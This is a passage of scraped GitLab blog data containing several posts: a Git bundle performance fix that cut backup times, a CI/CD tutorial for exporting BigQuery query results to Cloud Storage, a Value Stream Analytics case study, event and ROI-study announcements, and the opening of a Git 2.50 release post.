In our largest repositories containing millions of references, backup operations could extend beyond 48 hours.\n\n### Root cause analysis\n\nTo identify the root cause of this performance bottleneck, we analyzed a flame graph of the command during execution.\n\n![Flame graph showing command during execution](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097176/Blog/Content%20Images/Blog/Content%20Images/image1_aHR0cHM6_1750097176388.jpg)\n\nA flame graph displays the execution path of a command through its stack trace. Each bar corresponds to a function in the code, with the bar's width indicating how much time the command spent executing within that particular function.\n\nWhen examining the flame graph of `git bundle create` running on a repository with 10,000 references, approximately 80% of the execution time is consumed by the `object_array_remove_duplicates()` function. This function was introduced to Git in the [commit b2a6d1c686](https://gitlab.com/gitlab-org/git/-/commit/b2a6d1c686) (bundle: allow the same ref to be given more than once, 2009-01-17).\n\nTo understand this change, it's important to know that `git bundle create` allows users to specify which references to include in the bundle. For complete repository bundles, the `--all` flag packages all references.\n\nThe commit addressed a problem where users providing duplicate references through the command line – such as `git bundle create main.bundle main main` - would create a bundle without properly handling the duplicated main reference. Unbundling this bundle in a Git repository would break, because it tries to write the same ref twice. The code to avoid duplication uses nested `for` loops that iterate through all references to identify duplicates. 
This O(N²) algorithm becomes a significant performance bottleneck in repositories with large reference counts, consuming substantial processing time.\n\n### The fix: From O(N²) to efficient mapping\n\nTo resolve this performance issue, we contributed an upstream fix to Git that replaces the nested loops with a map data structure. Each reference is added to the map, which automatically ensures only a single copy of each reference is retained for processing.\n\nThis change dramatically enhances the performance of `git bundle create` and enables much better scalability in repositories with large reference counts. Benchmark testing on a repository with 100,000 references demonstrates a 6x performance improvement.\n\n```shell\nBenchmark 1: bundle (refcount = 100000, revision = master)\n  Time (mean ± σ): \t14.653 s ±  0.203 s\t[User: 13.940 s, System: 0.762 s]\n  Range (min … max):   14.237 s … 14.920 s\t10 runs\n\nBenchmark 2: bundle (refcount = 100000, revision = HEAD)\n  Time (mean ± σ):  \t2.394 s ±  0.023 s\t[User: 1.684 s, System: 0.798 s]\n  Range (min … max):\t2.364 s …  2.425 s\t10 runs\n\nSummary\n  bundle (refcount = 100000, revision = HEAD) ran\n\t6.12 ± 0.10 times faster than bundle (refcount = 100000, revision = master)\n```\n\nThe patch was accepted and [merged](https://gitlab.com/gitlab-org/git/-/commit/bb74c0abbc31da35be52999569ea481ebd149d1d) into upstream Git. 
At GitLab, we backported this fix to ensure our customers could benefit immediately, without waiting for the next Git release.\n\n## The result: Dramatically decreased backup times\n\nThe performance gains from this improvement have been nothing short of transformative:\n\n* **From 48 hours to 41 minutes:** Creating a backup of our largest repository (`gitlab-org/gitlab`) now takes just 1.4% of the original time.\n* **Consistent performance:** The improvement scales reliably across repository sizes.\n* **Resource efficiency:** We significantly reduced server load during backup operations.\n* **Broader applicability:** While backup creation sees the most dramatic improvement, all bundle-based operations that operate on many references benefit.\n\n## What this means for GitLab customers\n\nFor GitLab customers, this enhancement delivers immediate and tangible benefits on how organizations approach repository backup and disaster recovery planning:\n* **Transformed backup strategies**   \n  * Enterprise teams can establish comprehensive nightly schedules without impacting development workflows or requiring extensive backup windows.   \n  * Backups can now run seamlessly in the background during nightly schedules, instead of needing to be dedicated and lengthy.  \n* **Enhanced business continuity**  \n  * With backup times reduced from days to minutes, organizations significantly minimize their recovery point objectives (RPO). This translates to reduced business risk – in a disaster scenario, you're potentially recovering hours of work instead of days.  \n* **Reduced operational overhead**   \n  * Less server resource consumption and shorter maintenance windows.  \n  * Shorter backup windows mean reduced compute costs, especially in cloud environments, where extended processing time translates directly to higher bills.  \n* **Future-proofed infrastructure**   \n  * Growing repositories no longer force difficult choices between backup frequency and system performance.   
\n  * As your codebase expands, your backup strategy can scale seamlessly alongside it.\n\nOrganizations can now implement more robust backup strategies without compromising on performance or completeness. What was once a challenging trade-off has become a straightforward operational practice.\n\nStarting with the [GitLab 18.0](https://about.gitlab.com/releases/2025/05/15/gitlab-18-0-released/) release, all GitLab customers, regardless of their license tier, can already fully take advantage of these improvements for their [backup](https://docs.gitlab.com/administration/backup_restore/backup_gitlab/) strategy and execution. There is no further change in configuration required.\n\n## What's next\n\nThis breakthrough is part of our ongoing commitment to scalable, enterprise-grade Git infrastructure. While the improvement from 48 hours to 41 minutes for backup creation time represents a significant milestone, we continue to identify and address performance bottlenecks throughout our stack.\n\nWe're particularly proud that this enhancement was contributed upstream to the Git project, benefiting not just GitLab users but the broader Git community. This collaborative approach to development ensures that improvements are thoroughly reviewed, widely tested, and available to all.\n\n> Deep infrastructure work like this is how we approach performance at GitLab. Join the GitLab 18 virtual launch event to see what other fundamental improvements we're shipping. 
[Register today!](https://about.gitlab.com/eighteen/)",[983,900,757,966,475],"git",{"slug":985,"featured":91,"template":789},"how-we-decreased-gitlab-repo-backup-times-from-48-hours-to-41-minutes",{"content":987,"config":994},{"title":988,"description":989,"authors":990,"heroImage":895,"date":991,"body":992,"category":725,"tags":993},"Tutorial: Secure BigQuery data publishing with GitLab ","Learn how to create repeatable, auditable, and efficient processes for automating and securing BigQuery data exports.",[844],"2025-03-25","GitLab offers a powerful solution for automating and securing [BigQuery](https://cloud.google.com/bigquery) data exports. This integration transforms manual exports into repeatable, auditable processes that can eliminate security vulnerabilities while saving valuable time. This tutorial explains how to implement this solution so you can quickly reduce manual operations, permission issues, and security concerns with just a few lines of GitLab YAML code.\n\nFollow along with this step-by-step video:\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/gxXX-ItAreo?si=FijY9wMVppCW-18q\" frameborder=\"0\" allowfullscreen=\"true\">\u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\n## The solution architecture\n\nOur solution leverages GitLab CI/CD pipelines to automate the secure export of data from BigQuery to Google Cloud Storage. Here's the high-level architecture:\n\n1. SQL code is stored and version-controlled in GitLab.  \n2. After code review and approval, GitLab CI/CD pipeline executes the code.  \n3. The pipeline authenticates with Google Cloud.  \n4. SQL queries are executed against BigQuery.  \n5. Results are exported as CSV files to Google Cloud Storage.  \n6. 
Secure links to these files are provided for authorized consumption.\n\n## Prerequisites\n\nBefore we begin, ensure you have:\n\n* **Google Cloud APIs enabled:** BigQuery API and Cloud Storage API  \n* **Service account** with appropriate permissions:  \n  * BigQuery Job User  \n  * Storage Admin  \n  * **Note:** For this demo, we're using the service account approach for authentication, which is simpler to set up. For production environments, you might consider using GitLab's identity and access management integration with Google Cloud. This integration leverages Workload Identity Federation, which provides enhanced security and is more suitable for enterprise customers and organizations.  \n* **GitLab project** ready to store your SQL code and pipeline configuration\n\n## Step-by-step implementation\n\n**1. Configure Google Cloud credentials.**\n\nFirst, set up the necessary environment variables in your GitLab project:\n\n- Go to your **GitLab project > Settings > CI/CD**.  \n- Expand the **Variables** section.  \n- Add the following variables:  \n   * `GCS_BUCKET`: Your Google Cloud Storage bucket name  \n   * `GCP_PROJECT_ID`: Your Google Cloud project ID  \n   * `GCP_SA_KEY`: Base64-encoded service account key (mark as masked)\n\n**2. Create your SQL query.**\n\nCreate a file named `query.sql` in your GitLab repository with your BigQuery SQL query. 
The query looks like this:\n\n```\n-- This query shows a list of the daily top Google Search terms.\nSELECT\n   refresh_date AS Day,\n   term AS Top_Term,\n       -- These search terms are in the top 25 in the US each day.\n   rank,\nFROM `bigquery-public-data.google_trends.top_terms`\nWHERE\n   rank = 1\n       -- Choose only the top term each day.\n   AND refresh_date >= DATE_SUB(CURRENT_DATE(), INTERVAL 2 WEEK)\n       -- Filter to the last 2 weeks.\nGROUP BY Day, Top_Term, rank\nORDER BY Day DESC\n   -- Show the days in reverse chronological order.\n\n```\n\nThis query returns the top daily search term from Google Trends for each day in the last two weeks.\n\n**3. Configure the GitLab CI/CD pipeline.**\n\nCreate a `.gitlab-ci.yml` file in your repository root:\n\n```\nimage: google/cloud-sdk:alpine\n\ninclude:\n  - template: Jobs/Secret-Detection.gitlab-ci.yml  # https://gitlab.com/gitlab-org/gitlab/blob/master/lib/gitlab/ci/templates/Jobs/Secret-Detection.gitlab-ci.yml\n\nexecute:\n  stage: deploy\n  script: \n    # Set up Google Cloud authentication and install necessary components\n    - export GOOGLE_CLOUD_CREDENTIALS=$(echo $GCP_SA_KEY | base64 -d)\n    - echo $GOOGLE_CLOUD_CREDENTIALS > service-account-key.json \n    - gcloud auth activate-service-account --key-file service-account-key.json \n    - gcloud components install gsutil\n    # Set the active Google Cloud project\n    - gcloud config set project $GCP_PROJECT_ID\n    # Run the BigQuery query and export the results to a CSV file\n    - bq query --format=csv --use_legacy_sql=false \u003C query.sql > results.csv\n    # Create a Google Cloud Storage bucket if it doesn't exist\n    - gsutil ls gs://${GCS_BUCKET} || gsutil mb gs://${GCS_BUCKET}\n    # Upload the CSV file to the storage bucket\n    - gsutil cp results.csv gs://${GCS_BUCKET}/results.csv\n    # Set the access control list (ACL) to make the CSV file publicly readable\n    - gsutil acl ch -u AllUsers:R 
gs://${GCS_BUCKET}/results.csv\n    # Define the static URL for the CSV file\n    - export STATIC_URL=\"https://storage.googleapis.com/${GCS_BUCKET}/results.csv\"\n    # Display the static URL for the CSV file\n    - echo \"File URL = $STATIC_URL\"\n\n```\n\n**4. Run the pipeline.**\n\nNow, whenever changes are merged to your main branch, the pipeline will provide a link to the CSV file stored on the Google Cloud Storage bucket. This file contains the result of the executed SQL query that GitLab subjects to security checks.\n\n## Benefits of this approach\n\n* **Security:** Authentication is handled automatically via service accounts (or Workload Identity Federation for enhanced security in production environments).  \n* **Auditability:** All data exports are tracked through GitLab commits and pipeline logs.  \n* **Repeatability:** Consistent, predictable export process on every run, and can be scheduled.  \n* **Version control:** SQL queries are properly versioned and reviewed.  \n* **Automation:** Significantly fewer manual exports, reducing human error.\n\n## Try it today\n\nBy combining GitLab's DevSecOps capabilities with Google Cloud's BigQuery and Cloud Storage, you've now automated and secured your data publishing workflow. 
This approach reduces manual operations, resolves permission headaches, and addresses security concerns – all achieved with just a few lines of GitLab CI code.\n\n> Use this tutorial's [complete code example](https://gitlab.com/gitlab-partners-public/google-cloud/demos/big-query-data-publishing) to get started now.",[709,475,786,799,231,848],{"slug":995,"featured":91,"template":789},"tutorial-secure-bigquery-data-publishing-with-gitlab",{"content":997,"config":1007},{"title":998,"description":999,"authors":1000,"heroImage":1002,"date":1003,"body":1004,"category":725,"tags":1005},"How we reduced MR review time with Value Stream Management ","The GitLab engineering team leverages VSM to pinpoint bottlenecks in the merge request review process and streamline software delivery. See how we do it and what we've learned.",[1001],"Haim Snir","https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097876/Blog/Hero%20Images/Blog/Hero%20Images/REFERENCE%20-%20display%20preview%20for%20blog%20images%20%282%29_2pKf8RsKzAaThmQfqHIaa7_1750097875817.png","2025-02-20","At GitLab, we're passionate about using our own products internally, a.k.a. dogfooding. Dogfooding has led to significant improvements in accelerating our software delivery cycle time for customers. This article spotlights a specific use case where [GitLab Value Stream Management (VSM)](https://about.gitlab.com/solutions/value-stream-management/) has driven significant improvements for our engineering team. You'll learn how VSM helped us tackle two critical challenges: measuring the journey from idea conception to merge request completion, and streamlining our deployment workflows.\n\n## The Challenge: Identifying bottlenecks in MR reviews\n\nDespite having well-defined workflows, one team noticed that MRs were taking longer than expected to be reviewed and merged. 
The challenge wasn’t just about the delays themselves, but about understanding *where* in the review process these delays were happening and *why*.\n\nOur team’s goal was clear:\n\n- Identify where time was being spent from the initial idea to the final merge of an MR.  \n- Pinpoint specific bottlenecks in the review process.  \n- Understand how MR size, complexity, or documentation quality affect review time.\n\n## The Approach: Measuring MR review time in GitLab Value Stream Analytics\n\nValue Stream Analytics (VSA) enables organizations to map their entire workflow from idea to delivery, distinguishing between value-adding activities (VA) and non-value-adding activities (NVA) in the process flow. By calculating the ratio of value-added time to total lead time, the team can identify wasteful activities resulting in delays in MR reviews.\n\nTo obtain the necessary metrics, the team customized GitLab VSA to gain better visibility into our MR review process.\n\n### 1. Setting up a custom stage for MR review\n\nThe team added a [new custom stage](https://docs.gitlab.com/ee/user/group/value_stream_analytics/#value-stream-stage-events) in VSA called **Review Time to Merge** to specifically track the time from when a reviewer was first assigned to when the MR was merged.\n\n* Start event: MR first reviewer assigned  \n* End event: MR merged\n\nBy defining this stage, VSA began measuring the duration of the MR review process, giving us precise data on where time was being spent.\n\n![Defining stage of VSA](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097884/Blog/Content%20Images/Blog/Content%20Images/image2_aHR0cHM6_1750097883929.png)\n\n### 2. Using the Total Time Chart for clarity\n\nWith the custom stage in place, the team used the [**Total Time Chart** on the VSA Overview page](https://about.gitlab.com/blog/value-stream-total-time-chart/) (**Analyze > Value Stream**) to visualize how much time was spent during the new MR Review stage. 
By comparing the values represented by each area on the chart, the team could quickly identify how this stage contributed to the total software delivery lifecycle (SDLC) time.\n\n![total time chart for VSA](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097884/Blog/Content%20Images/Blog/Content%20Images/image1_aHR0cHM6_1750097883930.png)\n\n### 3. Drilling down for deeper insights\n\nTo investigate specific delays, the team used the **Stage Navigation Bar** to dive deeper into the MR Review stage. This view allowed them to:\n\n- Sort MRs by review time: The stage table showed all related MRs, sorted by review duration, making it easy to detect slow MRs.  \n- Analyze individual MRs: For each MR, the team could examine factors such as reviewer assignment delays, multiple rounds of feedback, idle time after approval, and MR size/complexity.\n\n## The outcome: Actionable insights and improvements\n\nBy customizing VSA to track [MR review time](https://docs.gitlab.com/user/project/merge_requests/reviews/), the team uncovered several key insights:\n\n- **Delays in reviewer assignment:** Some MRs experienced delays because reviewers were assigned late, or reviewers had too many MRs in their queue.  \n- **Slow review start times:** Even after assignment, certain MRs sat idle before reviews began, often due to context switching or competing priorities.  \n- **Multiple feedback loops:** Larger MRs often required multiple rounds of feedback, which extended review time significantly.  \n- **Idle time post-approval:** Some MRs were approved but not merged promptly, often due to deployment coordination issues.\n\nFor the engineering manager on the team, VSA proved to be transformational in managing their team's workflow: *\"I've used the VSA to justify where we were spending time in MR completion. 
We have VSA customized to our needs, and it's been very beneficial to our investigations for opportunities for improvements.”* \n\nAlso, from this dogfooding experience, we’re now developing a key enhancement to improve visibility into the review process. We're adding a new event to VSA — [Merge request last approved at](https://gitlab.com/gitlab-org/gitlab/-/issues/503754) — which creates a stage that breaks down MR review steps even further for granular visibility.\n\n## The power of data-driven decisions\n\nBy leveraging GitLab’s VSA, we didn’t just identify bottlenecks – we gained actionable insights that led to measurable improvements in MR review time and overall developer productivity. We optimized merge request review cycles and increased developer throughput, validating our commitment to continuous improvement through measurement.\n\n> Want to learn more about how VSA can help your team? [Start a free, 60-day trial of GitLab Ultimate](https://about.gitlab.com/free-trial/), customize your value streams, and see how you can make improvements throughout the SDLC for your teams. 
Then, make sure to [share your feedback and experiences in this issue](https://gitlab.com/gitlab-org/gitlab/-/issues/520962).\n\n## Read more\n\n- [Optimize value stream efficiency to do more with less, faster](https://about.gitlab.com/the-source/platform/optimize-value-stream-efficiency-to-do-more-with-less-faster/)\n- [New Scheduled Reports Generation tool simplifies value stream management](https://about.gitlab.com/blog/new-scheduled-reports-generation-tool-simplifies-value-stream-management/)\n- [Value stream analytics documentation](https://docs.gitlab.com/user/group/value_stream_analytics/)\n- [Value stream management: Total Time Chart simplifies top-down optimization flow](https://about.gitlab.com/blog/value-stream-total-time-chart/)\n",[757,785,475,799,1006],"solutions architecture",{"slug":1008,"featured":6,"template":789},"how-we-reduced-mr-review-time-with-value-stream-management",{"category":732,"slug":736,"posts":1010},[1011,1022,1035],{"content":1012,"config":1020},{"title":1013,"description":1014,"authors":1015,"heroImage":1016,"date":1017,"body":1018,"category":736,"tags":1019},"GitLab at Next '25: Transforming app modernization","GitLab participated in Google Cloud Next ‘25 and received a fifth consecutive Google Cloud Technology Partner of the Year recognition.",[844],"https://res.cloudinary.com/about-gitlab-com/image/upload/v1749663121/Blog/Hero%20Images/LogoLockupPlusLight.png","2025-04-11","GitLab's presence at Google Cloud Next '25 highlighted our strong partnership with Google Cloud and our joint commitment to accelerating software development and delivery. We were recognized again as a Technology Partner of the Year, and included in key enterprise initiatives like Google Distributed Cloud (GDC) Build Partners and [Startup Perks from Google Cloud](https://cloud.google.com/blog/topics/startups/why-global-startups-are-gathering-at-google-cloud-next25?e=13802955). 
Our team members demonstrated for attendees how GitLab is positioned to be a critical DevSecOps service for Google Cloud customers.\n\n## Continuing our award-winning partnership excellence\n\n\u003Cimg src=\"https://res.cloudinary.com/about-gitlab-com/image/upload/v1752175937/Blog/nempa4yvfutedz3fpuxx.jpg\" alt=\"GitLab team at Google Cloud Next '25\" align=\"left\" width=\"400px\" style=\"padding-right: 20px; padding-bottom: 10px\"/>\n\nWe're thrilled to announce that GitLab has once again been named a [Google Cloud Technology Partner of the Year award winner](https://about.gitlab.com/press/releases/2025-04-08-gitlab-wins-a-google-cloud-technology-partner-of-the-year-award-for-devops/), marking our fifth consecutive time receiving this prestigious honor. This remarkable achievement reaffirms our position as Google Cloud's primary DevOps partner, consistently delivering exceptional value year after year. The continued recognition highlights how our collaboration with Google Cloud creates tangible business outcomes for customers, enabling organizations across industries to build, secure, and deploy applications with efficiency and confidence.\n\n## Google Distributed Cloud: DevSecOps for highly regulated environments\n\nAnother significant milestone announced at Next '25 was GitLab's \"Google Cloud Ready - Distributed Cloud\" certification. This designation enables organizations to implement GitLab in air-gapped environments, addressing critical security and compliance requirements.\n\nAs an end-to-end DevSecOps solution available on Google Distributed Cloud, GitLab enables sovereign development and operations for workloads critical to national security and regulatory compliance. 
This integration is particularly valuable for government agencies and financial institutions that require the highest levels of data sovereignty while maintaining modern development practices.\n\n## GitLab perks for Google Startups\n\nGitLab is a Featured Partner of the new Startup Perks program from Google Cloud. This partnership ties up with our own [GitLab for Startups](https://about.gitlab.com/solutions/startups/google-cloud/) and is meant to jumpstart new tech ventures with key DevSecOps capabilities that can help with fast growth and scaling.\n\nAs one of the [Featured Perks partners](https://cloud.google.com/startup/perks), eligible startups can get free or discounted access to one year of [GitLab Ultimate](https://about.gitlab.com/pricing/ultimate/) for 20 licenses. For seed or early stage startups, this benefit can help ensure collaboration, efficiency, and security without sacrificing speed and agility.\n\n## Thoughts from the dais\n\nGitLab experts shared valuable insights across multiple speaking sessions at Next '25, delivering practical knowledge on AI-powered DevSecOps, platform engineering, and cloud application delivery:\n\n* __[AI DevOps panel](https://cloud.withgoogle.com/next/25/session-library?session=BRK2-163&utm_source=copylink&utm_medium=unpaidsoc&utm_campaign=FY25-Q2-global-EXP106-physicalevent-er-next25-mc&utm_content=reg-is-live-next-homepage-social-share&utm_term=-):__ Mike Flouton, GitLab Vice President of Product Management, joined industry leaders to discuss how AI code assist tools boost productivity while enhancing application performance.\n\n* __[Software Logistics - The Missing Link in Modern Platform Engineering](https://cloud.withgoogle.com/next/25/session-library?session=CT2-16&utm_source=copylink&utm_medium=unpaidsoc&utm_campaign=FY25-Q2-global-EXP106-physicalevent-er-next25-mc&utm_content=reg-is-live-next-homepage-social-share&utm_term=-):__ GitLab Field CTO Lee Faus explored how effective software logistics create the 
foundation for successful platform engineering initiatives.\n\n* __[Revolutionizing Cloud Application Delivery with Intelligent Agents](https://cloud.withgoogle.com/next/25/session-library?session=CT2-17&utm_source=copylink&utm_medium=unpaidsoc&utm_campaign=FY25-Q2-global-EXP106-physicalevent-er-next25-mc&utm_content=reg-is-live-next-homepage-social-share&utm_term=-):__ Faus also demonstrated how intelligent agents are transforming cloud application delivery pipelines.\n\n## Engaging attendees across Next '25\n\nIn addition to our speaking sessions, GitLab maintained a strong presence throughout Next '25. At our booth #2170 on the expo floor, our team engaged with hundreds of attendees through demonstrations and lightning talks featuring both GitLab experts and partners like Arctiq and SADA.\n\nThe Google Cloud Makerspace's Dev Tools Pantry became a hub of innovation and collaboration. John Coghlan, Director of Developer Advocacy, observed: \"It was great to connect with many GitLab and Google Cloud customers in the Dev Tools Pantry in the Makerspace. We loved seeing the creative solutions that people came up with around developer experience and simplified deployments using GitLab and Google Cloud as their ingredients.\"\n\nThese hands-on experiences showcased how GitLab's DevSecOps solutions integrate well with Google Cloud services, with our AI-powered capabilities demonstrations drawing particular interest from attendees looking to enhance developer productivity and application security.\n\n## GitLab and Google Cloud: Transforming the future together\n\nThe energy witnessed at Next '25 exemplifies why GitLab and Google Cloud make such powerful partners. 
Together, we help organizations to transform how they build, secure, and deploy applications through:\n\n* AI-assisted development capabilities and collaborative workflows that can help accelerate innovation in Google Cloud environments\n\n* Shift-left security approach that integrates with Google Cloud's security-first architecture to identify vulnerabilities early in the development lifecycle\n\n* Flexible deployment options and comprehensive observability that work harmoniously with Google Cloud infrastructure to help streamline operations\n\nAs demonstrated at Next '25, the GitLab and Google Cloud partnership delivers tangible advantages for development teams facing real-world challenges – whether accelerating AI adoption, strengthening security in regulated environments, or streamlining complex deployment pipelines. The technical integration points and customer success stories shared throughout the event underscore that this collaboration continues to produce practical solutions that matter.\n\n> #### Discover how GitLab and Google Cloud can transform your application development experience at [GitLab's Google Cloud partnership page](https://about.gitlab.com/partners/technology-partners/google-cloud-platform/).",[848,475,277,282,736],{"slug":1021,"featured":6,"template":789},"gitlab-at-next-25-transforming-app-modernization",{"content":1023,"config":1033},{"title":1024,"description":1025,"authors":1026,"heroImage":1028,"date":1029,"body":1030,"category":736,"tags":1031},"GitLab Ultimate's total economic impact: 483% ROI over 3 years","A Forrester Consulting study of GitLab Ultimate finds that the DevSecOps platform enhanced security posture with 5x time saved on security-related activities.\n",[1027],"Dave Steer","https://res.cloudinary.com/about-gitlab-com/image/upload/v1750098354/Blog/Hero%20Images/Blog/Hero%20Images/blog-image-template-1800x945%20%281%29_5XrohmuWBNuqL89BxVUzWm_1750098354056.png","2024-11-13","A powerful DevSecOps platform streamlines 
operations, prevents security vulnerabilities from disrupting (and costing) your business, increases productivity, and fosters a culture of innovation and collaboration. That's exactly what we built GitLab to do, and our Ultimate tier represents the full power of our platform. To see the real-world results, we commissioned Forrester Consulting to create a “Total Economic Impact™ of GitLab Ultimate” study. Here’s what we discovered at a glance. \n\nAccording to the study, for a composite organization based on interviewed customers, GitLab delivered:  \n\n* **Three-year ROI of 483%**  \n* **400% improvement in developer productivity**  \n* **15x faster time to first release\u003Csup>1\u003C/sup>**  \n* **5x time saved on security-related activities**\n\n**Overall, GitLab enables 50% more work with business value.** \n\nThe numbers tell a clear story: GitLab's platform transforms how teams work together. Whether you’re an application security lead tasked with improving the company’s security posture, a developer looking to deliver high-quality code faster, or a CTO looking for a scalable, secure, and flexible DevSecOps platform, this study (see full methodology below) shows that GitLab Ultimate delivers. Let’s break down the results.  \n\n> Download the full [2024 Forrester Consulting “Total Economic Impact of GitLab Ultimate” study](https://about.gitlab.com/resources/study-forrester-tei-gitlab-ultimate/).\n\n## **1\\. Three-year ROI of 483%**\n\n*“The big win for us was efficiency — both in administration and in overall operations. Now, everyone can work collaboratively, and we can easily automate our pipeline. I’m also able to move personnel around to complete different tasks more efficiently. 
Rather than needing to train on different tools across programs, now it’s just ‘learn GitLab,’ and they’re ready to begin working.”* - CTO and Senior Vice President, Defense industry\n\nThe study found that teams started seeing payback within six months of implementing GitLab Ultimate, primarily through improved efficiency. With a **483% ROI over three years**, organizations reduced their software toolchain costs by 25% and cut the time IT teams spent on administering complex toolchains by 75%. Beyond the cost savings, moving to a unified platform fundamentally improves how teams develop and deliver software.\n\n## **2\\. 400% improvement in productivity**\n\n*“When I have conversations about GitLab with our developers, they universally agree that it has increased productivity at our organization across teams and roles. We now have one platform that has functions that everyone can use.”* - Software architect, Energy/Research industry\n\nDevelopers thrive in environments where they can easily switch between tasks without losing momentum. According to the study, developers can reclaim up to 305 hours per year by using [testing automation](https://about.gitlab.com/topics/devops/devops-test-automation/) within GitLab to help them test more frequently and track and fix bugs faster, all within a single interface with no context switching. This streamlined workflow allows them to focus on coding rather than juggling multiple tools and processes.\n\nThe productivity gains extend to onboarding, too: new hires in the composite organization’s software development team ramped up to full productivity 75% faster (i.e., in 1.5 weeks instead of 1.5 months). The impact is clear: Everyone on the team can contribute meaningful work sooner. \n\n## **3\\. 15x faster time to first release**\n\n*“Our superpower is software. It’s measured in terms of velocity and the ability to get new capabilities into the hands of our customers. 
For that to remain our primary focus, it just made economic sense to \\[consolidate\\] onto a single platform.”* - CTO and Senior Vice President, Defense industry\n\nThe summary data from the customer interviews reveals that GitLab enables organizations to accelerate first production release by 15 times. This boost is achieved through faster project initiation, more frequent software releases, and a proactive approach to security that natively integrates security scans into the development process from the outset. Even with this increase in velocity, software quality, and security remain at the same high levels, thanks to developers' ability to fix issues early and quickly. \n\nWith [security built directly into the development process](https://about.gitlab.com/solutions/security-compliance/), developers can identify, prioritize, and remediate vulnerabilities without disrupting their flow. This unified approach to managing the entire software development lifecycle means teams can move faster without compromising on security.\n\n## **4\\. 5x time saved on security-related activities**\n\n*“Integrating security and quality scanners into the pipeline was a game changer for us. With more automation and less manual work, we’re seeing fewer failures, fewer problems, and faster progress.”* - Program Manager, Finance industry \n\nSecurity is top-of-mind for every organization, as development speeds up and threats keep evolving. GitLab saves security team members in the composite organization **78 hours per member per year** by automating recurring tasks like disaster recovery prep, auditing, and compliance checks. GitLab also improves visibility into software development processes, helping security and development teams work together more efficiently.  
\n\nCybersecurity and software development teams at the composite organization **managed and mitigated security risks throughout the software development lifecycle with 81% less effort.** This is because GitLab enabled them to integrate security protocols and scans throughout all stages of the software development lifecycle, simplifying how they maintain stringent security standards. As security testing and remediation are built into pipelines, teams reduce average response times and the risk of issues reaching production. \n\n# **Experience DevSecOps in action**\n\nWith a 483% ROI, a rapid payback period, and countless success stories, GitLab is an invaluable tool for enterprises looking to transform their software development processes.\n\n> To explore how GitLab can benefit your organization, download the full [Forrester Consulting “Total Economic Impact of GitLab Ultimate” study today](https://about.gitlab.com/resources/study-forrester-tei-gitlab-ultimate/).\n\n**Methodology**  \n*For the study, Forrester interviewed four GitLab Ultimate customers across industries, including finance, defense, and research, and created a composite organization to represent the aggregated results of these interviews. The composite organization is expected to adopt GitLab Ultimate across all teams in a three-year period.*\n\n*The composite organization is a $5 billion company with 5,000 employees, with 40% involved in software delivery and 50% of annual revenue driven by software development. Their goals are to consolidate multiple tools into a single, integrated platform, enhance developer productivity, ensure compliance with industry regulations and internal policies, and strengthen security throughout the development lifecycle.*\n\n*1. 
Based on summary data from customer interviews; not applicable to the composite organization results.*",[475,1032,736,767],"research",{"slug":1034,"featured":91,"template":789},"gitlab-ultimates-total-economic-impact-483-roi-over-3-years",{"content":1036,"config":1045},{"title":1037,"description":1038,"authors":1039,"heroImage":1041,"date":1042,"body":1043,"category":736,"tags":1044},"Introducing The Source: Insights for the future of software development","Explore our new publication for transformative software development strategies and expert advice on emerging technologies.",[1040],"Chandler Gibbons","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749674616/Blog/Hero%20Images/blog-image-template-1800x945__1_.png","2024-10-29","Modern software development is transforming the way organizations create, deliver, and scale business value. Teams must be able to build solutions quickly and efficiently while navigating rising security threats, emerging technologies, and increasingly complex compliance demands.\n\nToday, GitLab is launching [The Source](https://about.gitlab.com/the-source/), a new publication that covers the evolution of software development as an engine for business success. We offer regular insights into the future of software development, supported by original research and analysis from our subject matter experts and thought leaders.\n\nOn The Source, you will find answers to questions such as:  \n* How can leaders measure the ROI of AI across the software development lifecycle?  \n* What’s the best way to ensure security and compliance across the entire software supply chain?\n* What types of efficiencies will teams see from platform and toolchain consolidation?\n\nHere’s a sample of what's on The Source today:\n\n**4 steps for measuring the impact of AI**\n\n\"Evaluating the productivity of AI-enhanced coding requires a more nuanced approach than traditional metrics such as lines of code, code commits, or task completion. 
It necessitates shifting the focus to real-world business outcomes that balance development speed, software quality, and security.\"  \n- [Learn the 4 steps from AI expert Taylor McCaslin.](https://about.gitlab.com/the-source/ai/4-steps-for-measuring-the-impact-of-ai/)\n\n**Addressing the root cause of common security frustrations**\n\n\"DevSecOps promises better integration between engineering and security, but it’s clear that frustrations and misalignment persist. That’s because these challenges are symptoms of a larger problem with how organizations view security, as well as how teams work together and how they allocate time to security.\"  \n- [Solve this disconnect with expert advice from GitLab CISO Josh Lemos.](https://about.gitlab.com/the-source/security/security-its-more-than-culture-addressing-the-root-cause-of-common-security/)\n\n**Driving business results with platform engineering**\n\n\"Platform engineering aims to normalize and standardize developer workflows by providing developers with optimized 'golden paths' for most of their workloads and flexibility to define exceptions for the rest.\"  \n- [Discover GitLab Field CTO Brian Wald's best practices for platform engineering success.](https://about.gitlab.com/the-source/platform-and-infrastructure/driving-business-results-with-platform-engineering/)\n\n## Make The Source your decision-making partner\n\nVisit [The Source](https://about.gitlab.com/the-source/) today to explore the latest insights, get answers to your leadership questions, and learn something new to share with your teams. You can also subscribe to our newsletter for regular updates directly to your inbox. 
Join our community of forward-thinking technology leaders and help shape the future of software development.",[675,767,736,709],{"slug":1046,"featured":91,"template":789},"introducing-the-source-insights-for-the-future-of-software-development",{"category":743,"slug":747,"posts":1048},[1049,1061,1073],{"content":1050,"config":1059},{"title":1051,"description":1052,"authors":1053,"heroImage":1055,"body":1056,"date":1057,"category":747,"tags":1058},"What’s new in Git 2.50.0?","Here are contributions from GitLab's Git team and the Git community such as the git-diff-pairs(1) command and git-update-ref(1) option to perform batched reference updates.",[1054],"Justin Tobler","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749663087/Blog/Hero%20Images/git3-cover.png","The Git project recently released [Git Version 2.50.0](https://lore.kernel.org/git/xmqq1prj1umb.fsf@gitster.g/T/#u). Let's look at a few notable highlights from this release, which includes contributions from the Git team at GitLab and also the wider Git community.\n## New git-diff-pairs(1) command\n\nDiffs are at the heart of every code review and show all the changes made\nbetween two revisions. GitLab shows diffs in various places, but the most\ncommon place is a merge request's [\"Changes\" 